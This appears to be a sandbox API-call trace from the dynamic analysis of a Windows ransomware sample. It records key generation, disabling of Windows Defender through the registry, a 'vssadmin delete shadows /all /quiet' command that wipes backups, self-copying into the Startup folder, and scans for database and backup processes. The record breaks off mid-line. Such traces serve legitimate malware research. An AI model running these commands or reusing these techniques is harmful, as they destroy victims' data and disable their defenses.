[0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.719] GetLastError () returned 0x0 [0036.719] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.720] GetLastError () returned 0x0 [0036.720] GetTickCount () returned 0x1149c12 [0036.721] GetLastError () returned 0x0 [0036.721] GetTickCount () returned 0x1149c12 [0036.721] GetLastError () returned 0x0 [0036.721] GetTickCount () returned 0x1149c12 [0036.721] GetLastError () returned 0x0 [0036.721] GetTickCount () returned 0x1149c12 [0036.721] GetLastError () returned 0x0 [0036.721] GetTickCount () returned 0x1149c12 [0036.721] GetLastError () returned 0x0 [0036.721] GetTickCount () returned 0x1149c12 [0036.721] GetLastError () returned 0x0 [0036.721] GetTickCount () returned 0x1149c12 [0036.721] GetLastError () returned 0x0 [0036.721] GetTickCount () returned 0x1149c12 [0036.831] LocalAlloc (uFlags=0x0, uBytes=0x3d42) returned 0xbf1be8 [0036.832] GetModuleHandleW (lpModuleName="") returned 0x0 [0036.832] VirtualProtect (in: lpAddress=0xbf1be8, dwSize=0x3d42, flNewProtect=0x40, lpflOldProtect=0x19f684 | out: lpflOldProtect=0x19f684*=0x4) returned 1 [0036.834] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75e90000 [0036.834] GetProcAddress (hModule=0x75e90000, lpProcName="GlobalAlloc") returned 0x75ea5750 [0036.834] GetProcAddress (hModule=0x75e90000, lpProcName="GetLastError") returned 0x75ea5010 [0036.834] GetProcAddress (hModule=0x75e90000, lpProcName="Sleep") returned 0x75ea6760 [0036.834] GetProcAddress (hModule=0x75e90000, lpProcName="VirtualAlloc") returned 0x75ea6970 [0036.834] GetProcAddress (hModule=0x75e90000, lpProcName="CreateToolhelp32Snapshot") returned 0x75ededc0 [0036.834] GetProcAddress (hModule=0x75e90000, lpProcName="Module32First") returned 0x75edfc90 [0036.834] GetProcAddress (hModule=0x75e90000, lpProcName="CloseHandle") returned 0x75efeab0 [0036.834] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0xd0 [0036.836] Module32First (hSnapshot=0xd0, lpme=0x19f414) returned 1 [0036.836] VirtualAlloc (lpAddress=0x0, dwSize=0x6450, flAllocationType=0x1000, flProtect=0x40) returned 0x30000 [0036.838] GetProcAddress (hModule=0x75e90000, lpProcName="LoadLibraryA") returned 0x75ea5a80 [0036.838] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75e90000 [0036.838] GetProcAddress (hModule=0x75e90000, lpProcName="VirtualAlloc") returned 0x75ea6970 [0036.838] GetProcAddress (hModule=0x75e90000, lpProcName="VirtualProtect") returned 0x75ea6a30 [0036.838] GetProcAddress (hModule=0x75e90000, lpProcName="VirtualFree") returned 0x75ea69d0 [0036.838] GetProcAddress (hModule=0x75e90000, lpProcName="GetVersionExA") returned 0x75ea56d0 [0036.838] GetProcAddress (hModule=0x75e90000, lpProcName="TerminateProcess") returned 0x75ea67e0 [0036.838] GetProcAddress (hModule=0x75e90000, lpProcName="ExitProcess") returned 0x75ea3cb0 [0036.838] GetProcAddress (hModule=0x75e90000, lpProcName="SetErrorMode") returned 0x75ea6500 [0036.838] SetErrorMode (uMode=0x400) returned 0x0 [0036.838] SetErrorMode (uMode=0x0) returned 0x400 [0036.838] GetVersionExA (in: lpVersionInformation=0x19e344*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xbea880, dwMinorVersion=0xbeacf0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="\n") | out: lpVersionInformation=0x19e344*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0036.839] VirtualAlloc (lpAddress=0x0, dwSize=0x5600, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0036.839] VirtualProtect (in: lpAddress=0x400000, dwSize=0xb000, flNewProtect=0x40, lpflOldProtect=0x19f3cc | out: lpflOldProtect=0x19f3cc*=0x2) returned 1 [0036.876] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.876] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75f60000 [0042.811] GetProcAddress (hModule=0x75f60000, lpProcName="PathRemoveFileSpecW") returned 0x75f74500 [0042.811] GetProcAddress (hModule=0x75f60000, lpProcName="StrStrIW") returned 0x75f74390 [0042.811] GetProcAddress (hModule=0x75f60000, lpProcName="StrCmpNA") returned 0x75f7ca10 [0042.811] GetProcAddress (hModule=0x75f60000, lpProcName="wnsprintfW") returned 0x75f84e90 [0042.811] GetProcAddress (hModule=0x75f60000, lpProcName="StrCmpNW") returned 0x75f72800 [0042.811] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x72ec0000 [0043.178] GetProcAddress (hModule=0x72ec0000, lpProcName="InternetCrackUrlW") returned 0x7301cfa0 [0043.179] GetProcAddress (hModule=0x72ec0000, lpProcName="InternetQueryDataAvailable") returned 0x72feec50 [0043.179] GetProcAddress (hModule=0x72ec0000, lpProcName="InternetOpenW") returned 0x72fde9e0 [0043.179] GetProcAddress (hModule=0x72ec0000, lpProcName="InternetReadFile") returned 0x72ff3a70 [0043.179] GetProcAddress (hModule=0x72ec0000, lpProcName="InternetConnectW") returned 0x72fce000 [0043.179] GetProcAddress (hModule=0x72ec0000, lpProcName="HttpOpenRequestW") returned 0x7303bdd0 [0043.179] GetProcAddress (hModule=0x72ec0000, lpProcName="InternetCloseHandle") returned 0x72fcd000 [0043.179] GetProcAddress (hModule=0x72ec0000, lpProcName="HttpSendRequestW") returned 0x72fe9490 [0043.179] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x74710000 [0043.179] GetProcAddress (hModule=0x74710000, lpProcName="RpcStringFreeW") returned 0x74745830 [0043.179] GetProcAddress (hModule=0x74710000, lpProcName="UuidToStringW") returned 0x7474c200 [0043.179] GetProcAddress (hModule=0x74710000, lpProcName="UuidCreate") returned 0x7474e8b0 [0043.179] LoadLibraryA (lpLibFileName="RstrtMgr.DLL") returned 0x72e90000 [0045.162] GetProcAddress (hModule=0x72e90000, lpProcName="RmRegisterResources") returned 0x72e97660 [0045.162] GetProcAddress (hModule=0x72e90000, lpProcName="RmGetList") returned 0x72e974f0 [0045.162] GetProcAddress (hModule=0x72e90000, lpProcName="RmEndSession") returned 0x72e97420 [0045.162] GetProcAddress (hModule=0x72e90000, lpProcName="RmStartSession") returned 0x72e97930 [0045.162] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x75e90000 [0045.162] GetProcAddress (hModule=0x75e90000, lpProcName="ExpandEnvironmentStringsW") returned 0x75ea4a40 [0045.162] GetProcAddress (hModule=0x75e90000, lpProcName="CreateThread") returned 0x75ea46b0 [0045.162] GetProcAddress (hModule=0x75e90000, lpProcName="lstrcpyW") returned 0x75ee7140 [0045.162] GetProcAddress (hModule=0x75e90000, lpProcName="GetCurrentProcessId") returned 0x75efea20 [0045.162] GetProcAddress (hModule=0x75e90000, lpProcName="DeleteFileW") returned 0x75efed40 [0045.162] GetProcAddress (hModule=0x75e90000, lpProcName="GetWindowsDirectoryW") returned 0x75ea5730 [0045.162] GetProcAddress (hModule=0x75e90000, lpProcName="CloseHandle") returned 0x75efeab0 [0045.162] GetProcAddress (hModule=0x75e90000, lpProcName="DeleteCriticalSection") returned 0x77bdfb90 [0045.163] GetProcAddress (hModule=0x75e90000, lpProcName="CreateToolhelp32Snapshot") returned 0x75ededc0 [0045.163] GetProcAddress (hModule=0x75e90000, lpProcName="FindNextFileW") returned 0x75efee40 [0045.163] GetProcAddress (hModule=0x75e90000, lpProcName="lstrcatW") returned 0x75ee71a0 [0045.163] GetProcAddress (hModule=0x75e90000, lpProcName="lstrcmpiW") returned 0x75ea6bf0 [0045.163] GetProcAddress (hModule=0x75e90000, lpProcName="Process32NextW") returned 0x75edf8f0 [0045.163] GetProcAddress (hModule=0x75e90000, lpProcName="WaitForMultipleObjects") returned 0x75efec80 [0045.163] GetProcAddress (hModule=0x75e90000, lpProcName="FindClose") returned 0x75efed70 [0045.163] GetProcAddress (hModule=0x75e90000, lpProcName="EnterCriticalSection") returned 0x77bfb2d0 [0045.163] GetProcAddress (hModule=0x75e90000, lpProcName="MoveFileW") returned 0x75ede500 [0045.163] GetProcAddress (hModule=0x75e90000, lpProcName="GetProcAddress") returned 0x75ea51b0 [0045.163] GetProcAddress (hModule=0x75e90000, lpProcName="GetLastError") returned 0x75ea5010 [0045.163] GetProcAddress (hModule=0x75e90000, lpProcName="GetTickCount") returned 0x75efdd50 [0045.164] GetProcAddress (hModule=0x75e90000, lpProcName="HeapReAlloc") returned 0x77bef630 [0045.164] GetProcAddress (hModule=0x75e90000, lpProcName="HeapAlloc") returned 0x77bf2dc0 [0045.164] GetProcAddress (hModule=0x75e90000, lpProcName="HeapFree") returned 0x75ea57f0 [0045.164] GetProcAddress (hModule=0x75e90000, lpProcName="GetProcessHeap") returned 0x75ea51f0 [0045.164] GetProcAddress (hModule=0x75e90000, lpProcName="FindResourceW") returned 0x75ea4aa0 [0045.164] GetProcAddress (hModule=0x75e90000, lpProcName="LoadResource") returned 0x75ea5b00 [0045.164] GetProcAddress (hModule=0x75e90000, lpProcName="SizeofResource") returned 0x75ea6740 [0045.164] GetProcAddress (hModule=0x75e90000, lpProcName="GetModuleHandleA") returned 0x75ea50b0 [0045.164] GetProcAddress (hModule=0x75e90000, lpProcName="WideCharToMultiByte") returned 0x75ea6b10 [0045.164] GetProcAddress (hModule=0x75e90000, lpProcName="LoadLibraryA") returned 0x75ea5a80 [0045.164] GetProcAddress (hModule=0x75e90000, lpProcName="lstrcpyA") returned 0x75ee7060 [0045.164] GetProcAddress (hModule=0x75e90000, lpProcName="ExitProcess") returned 0x75ea3cb0 [0045.164] GetProcAddress (hModule=0x75e90000, lpProcName="FindFirstFileW") returned 0x75efedf0 [0045.165] GetProcAddress (hModule=0x75e90000, lpProcName="SetFilePointerEx") returned 0x75eff130 [0045.165] GetProcAddress (hModule=0x75e90000, lpProcName="GetModuleHandleW") returned 0x75ea50d0 [0045.165] GetProcAddress (hModule=0x75e90000, lpProcName="GetUserDefaultLangID") returned 0x75ea5690 [0045.165] GetProcAddress (hModule=0x75e90000, lpProcName="InitializeCriticalSection") returned 0x77c0af20 [0045.165] GetProcAddress (hModule=0x75e90000, lpProcName="OpenProcess") returned 0x75ea5cc0 [0045.165] GetProcAddress (hModule=0x75e90000, lpProcName="CopyFileW") returned 0x75eff3b0 [0045.165] GetProcAddress (hModule=0x75e90000, lpProcName="LeaveCriticalSection") returned 0x77bfb250 [0045.165] GetProcAddress (hModule=0x75e90000, lpProcName="TerminateProcess") returned 0x75ea67e0 [0045.165] GetProcAddress (hModule=0x75e90000, lpProcName="GetModuleFileNameW") returned 0x75ea5090 [0045.165] GetProcAddress (hModule=0x75e90000, lpProcName="lstrcmpW") returned 0x75ea6bb0 [0045.165] GetProcAddress (hModule=0x75e90000, lpProcName="lstrlenW") returned 0x75ea6c70 [0045.165] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x761b0000 [0045.165] GetProcAddress (hModule=0x761b0000, lpProcName="CryptDestroyKey") returned 0x761cfa60 [0045.166] GetProcAddress (hModule=0x761b0000, lpProcName="CryptGenKey") returned 0x761d3430 [0045.166] GetProcAddress (hModule=0x761b0000, lpProcName="CryptExportKey") returned 0x761cf700 [0045.166] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x72d60000 [0045.398] GetProcAddress (hModule=0x72d60000, lpProcName="atexit") returned 0x72d7c544 [0045.398] atexit (param_1=0x30920) returned 0 [0045.399] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x761b0000 [0045.399] LoadLibraryW (lpLibFileName="mpr.dll") returned 0x72d40000 [0045.867] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x76480000 [0050.029] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0050.029] FindResourceW (hModule=0x400000, lpName=0x7f, lpType=0xa) returned 0x408048 [0050.029] LoadResource (hModule=0x400000, hResInfo=0x408048) returned 0x408058 [0050.029] SizeofResource (hModule=0x400000, hResInfo=0x408048) returned 0x140a [0050.029] GetProcessHeap () returned 0xbe0000 [0050.029] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x140a) returned 0xc040e0 [0050.029] GetUserDefaultLangID () returned 0x409 [0050.030] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19ed60 | out: TokenHandle=0x19ed60*=0x224) returned 1 [0050.436] GetTokenInformation (in: TokenHandle=0x224, TokenInformationClass=0x14, TokenInformation=0x19ed58, TokenInformationLength=0x4, ReturnLength=0x19ed5c | out: TokenInformation=0x19ed58, ReturnLength=0x19ed5c) returned 1 [0050.436] CloseHandle (hObject=0x224) returned 1 [0050.436] CryptAcquireContextW (in: phProv=0x19f3e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x19f3e0*=0xbf5f28) returned 1 [0050.699] GetModuleHandleW (lpModuleName="ntdll") returned 0x77bb0000 [0050.699] GetProcAddress (hModule=0x77bb0000, lpProcName="RtlGetVersion") returned 0x77bdfff0 [0050.699] RtlGetVersion (in: lpVersionInformation=0x19f1b8 | out: lpVersionInformation=0x19f1b8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x3ad7, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0050.699] CryptGenKey (in: hProv=0xbf5f28, Algid=0xa400, dwFlags=0x4000001, phKey=0x19ed54 | out: phKey=0x19ed54*=0xbfe398) returned 1 [0050.804] GetProcessHeap () returned 0xbe0000 [0050.804] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x10) returned 0xc01ff8 [0050.804] GetProcessHeap () returned 0xbe0000 [0050.804] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc09940 [0050.804] CryptExportKey (in: hKey=0xbfe398, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0xc09940, pdwDataLen=0x19ed5c | out: pbData=0xc09940*, pdwDataLen=0x19ed5c*=0x94) returned 1 [0050.804] GetProcessHeap () returned 0xbe0000 [0050.804] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x94) returned 0xbee0e0 [0050.804] CryptExportKey (in: hKey=0xbfe398, hExpKey=0x0, dwBlobType=0x7, dwFlags=0x0, pbData=0xc09940, pdwDataLen=0x19ed5c | out: pbData=0xc09940*, pdwDataLen=0x19ed5c*=0x254) returned 1 [0050.804] GetProcessHeap () returned 0xbe0000 [0050.804] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x254) returned 0xc08458 [0050.804] GetProcessHeap () returned 0xbe0000 [0050.804] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc09940 | out: hHeap=0xbe0000) returned 1 [0050.804] CryptDestroyKey (hKey=0xbfe398) returned 1 [0050.804] CryptImportKey (in: hProv=0xbf5f28, pbData=0xbee0e0, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x0, phKey=0x406020 | out: phKey=0x406020*=0xbfdd18) returned 1 [0050.804] GetProcessHeap () returned 0xbe0000 [0050.804] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc09940 [0050.804] CryptImportKey (in: hProv=0xbf5f28, pbData=0xc040e0, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x19f3d8 | out: phKey=0x19f3d8*=0xbfe398) returned 1 [0050.805] CryptEncrypt (in: hKey=0xbfe398, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x19f2d4*, pdwDataLen=0x19f3dc*=0xf5, dwBufLen=0x100 | out: pbData=0x19f2d4*, pdwDataLen=0x19f3dc*=0x100) returned 1 [0050.807] CryptEncrypt (in: hKey=0xbfe398, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x19f2d4*, pdwDataLen=0x19f3dc*=0xf5, dwBufLen=0x100 | out: pbData=0x19f2d4*, pdwDataLen=0x19f3dc*=0x100) returned 1 [0050.807] CryptEncrypt (in: hKey=0xbfe398, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x19f2d4*, pdwDataLen=0x19f3dc*=0x6a, dwBufLen=0x100 | out: pbData=0x19f2d4*, pdwDataLen=0x19f3dc*=0x100) returned 1 [0050.807] CryptDestroyKey (hKey=0xbfe398) returned 1 [0050.807] GetProcessHeap () returned 0xbe0000 [0050.807] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xbee0e0 | out: hHeap=0xbe0000) returned 1 [0050.807] GetProcessHeap () returned 0xbe0000 [0050.807] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc08458 | out: hHeap=0xbe0000) returned 1 [0050.807] GetProcessHeap () returned 0xbe0000 [0050.808] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc01ff8 | out: hHeap=0xbe0000) returned 1 [0050.808] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", ulOptions=0x0, samDesired=0x2, phkResult=0x19f3d4 | out: phkResult=0x19f3d4*=0x234) returned 0x0 [0050.808] RegSetValueExW (in: hKey=0x234, lpValueName="DisableAntiSpyware", Reserved=0x0, dwType=0x4, lpData=0x19f3e4*=0x1, cbData=0x4 | out: lpData=0x19f3e4*=0x1) returned 0x0 [0050.808] RegCloseKey (hKey=0x234) returned 0x0 [0050.808] GetWindowsDirectoryW (in: lpBuffer=0x19ef7c, uSize=0x104 | out: lpBuffer="C:\\WINDOWS") returned 0xa [0050.808] lstrcatW (in: lpString1="C:\\WINDOWS", lpString2="\\sysnative\\vssadmin.exe" | out: lpString1="C:\\WINDOWS\\sysnative\\vssadmin.exe") returned="C:\\WINDOWS\\sysnative\\vssadmin.exe" [0050.808] lstrcpyW (in: lpString1=0x19ed74, lpString2=" delete shadows /all /quiet" | out: lpString1=" delete shadows /all /quiet") returned=" delete shadows /all /quiet" [0050.808] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="C:\\WINDOWS\\sysnative\\vssadmin.exe", lpParameters=" delete shadows /all /quiet", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0058.765] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x19eb54 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming") returned 0x0 [0059.178] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0059.178] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", lpString2="taridd" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\taridd") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\taridd" [0059.178] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\taridd" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\taridd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x6, hTemplateFile=0x0) returned 0x2f4 [0059.178] GetLastError () returned 0x0 [0059.178] GetTickCount () returned 0x114f3c7 [0059.178] GetTickCount () returned 0x114f3c7 [0059.178] GetTickCount () returned 0x114f3c7 [0059.178] GetTickCount () returned 0x114f3c7 [0059.178] GetTickCount () returned 0x114f3c7 [0059.179] GetTickCount () returned 0x114f3c7 [0059.179] WriteFile (in: hFile=0x2f4, lpBuffer=0x406260*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x19ed5c, lpOverlapped=0x0 | out: lpBuffer=0x406260*, lpNumberOfBytesWritten=0x19ed5c*=0x6, lpOverlapped=0x0) returned 1 [0059.180] CloseHandle (hObject=0x2f4) returned 1 [0059.181] StrCmpNA (lpStr1="%link%", lpStr2="%name%", nChar=6) returned -1 [0059.181] StrCmpNA (lpStr1="%link%", lpStr2="%link%", nChar=6) returned 0 [0059.181] StrCmpNA (lpStr1="%name%", lpStr2="%name%", nChar=6) returned 0 [0059.181] StrCmpNA (lpStr1="%ID%\r\n", lpStr2="%name%", nChar=6) returned -1 [0059.181] StrCmpNA (lpStr1="%ID%\r\n", lpStr2="%link%", nChar=6) returned -1 [0059.181] StrCmpNA (lpStr1="%ID%", lpStr2="%ID%", nChar=4) returned 0 [0059.181] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19eb18, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\uvulko.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\uvulko.exe")) returned 0x22 [0059.181] lstrcpyW (in: lpString1=0x19e910, lpString2="C:\\Users\\FD1HVy\\Desktop\\uvulko.exe" | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\uvulko.exe") returned="C:\\Users\\FD1HVy\\Desktop\\uvulko.exe" [0059.182] PathRemoveFileSpecW (in: pszPath="C:\\Users\\FD1HVy\\Desktop\\uvulko.exe" | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 1 [0059.182] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x19e708 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0059.182] lstrcmpW (lpString1="C:\\Users\\FD1HVy\\Desktop", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0059.182] GetTickCount () returned 0x114f3c7 [0059.182] GetTickCount () returned 0x114f3c7 [0059.182] GetTickCount () returned 0x114f3c7 [0059.182] GetTickCount () returned 0x114f3c7 [0059.182] GetTickCount () returned 0x114f3c7 [0059.182] GetTickCount () returned 0x114f3c7 [0059.182] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.183] GetTickCount () returned 0x114f3c7 [0059.184] wnsprintfW (in: pszDest=0x406040, cchDest=260, pszFmt="%s\\%s" | out: pszDest="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB") returned 107 [0059.184] wnsprintfW (in: pszDest=0x19e500, cchDest=260, pszFmt="%s.exe" | out: pszDest="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB.exe") returned 111 [0059.184] CopyFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\uvulko.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\uvulko.exe"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\jq9oafjnqkea58w4cpypj91gqq5vb.exe"), bFailIfExists=0) returned 1 [0059.488] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2f8 [0059.500] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0059.500] StrCmpNW (lpStr1="[Syst", lpStr2="mysql", nChar=5) returned -1 [0059.500] StrCmpNW (lpStr1="[Sy", lpStr2="IBM", nChar=3) returned -1 [0059.500] StrCmpNW (lpStr1="[Syst", lpStr2="bes10", nChar=5) returned -1 [0059.500] StrCmpNW (lpStr1="[Syst", lpStr2="black", nChar=5) returned -1 [0059.501] StrCmpNW (lpStr1="[Sy", lpStr2="sql", nChar=3) returned -1 [0059.501] StrCmpNW (lpStr1="[System P", lpStr2="store.exe", nChar=9) returned -1 [0059.501] StrCmpNW (lpStr1="[Sy", lpStr2="vee", nChar=3) returned -1 [0059.501] StrCmpNW (lpStr1="[Syst", lpStr2="postg", nChar=5) returned -1 [0059.501] StrCmpNW (lpStr1="[Sys", lpStr2="sage", nChar=4) returned -1 [0059.501] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0059.501] StrCmpNW (lpStr1="Syste", lpStr2="mysql", nChar=5) returned 1 [0059.501] StrCmpNW (lpStr1="Sys", lpStr2="IBM", nChar=3) returned 1 [0059.501] StrCmpNW (lpStr1="Syste", lpStr2="bes10", nChar=5) returned 1 [0059.501] StrCmpNW (lpStr1="Syste", lpStr2="black", nChar=5) returned 1 [0059.501] StrCmpNW (lpStr1="Sys", lpStr2="sql", nChar=3) returned 1 [0059.501] StrCmpNW (lpStr1="System", lpStr2="store.exe", nChar=9) returned 1 [0059.501] StrCmpNW (lpStr1="Sys", lpStr2="vee", nChar=3) returned -1 [0059.501] StrCmpNW (lpStr1="Syste", lpStr2="postg", nChar=5) returned 1 [0059.501] StrCmpNW (lpStr1="Syst", lpStr2="sage", nChar=4) returned 1 [0059.501] Process32NextW (in: hSnapshot=0x2f8, lppe=0x19eaec | out: lppe=0x19eaec*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0059.722] StrCmpNW (lpStr1="smss.", lpStr2="mysql", nChar=5) returned 1 [0059.722] StrCmpNW (lpStr1="sms", lpStr2="IBM", nChar=3) returned 1 [0059.722] StrCmpNW (lpStr1="smss.", lpStr2="bes10", 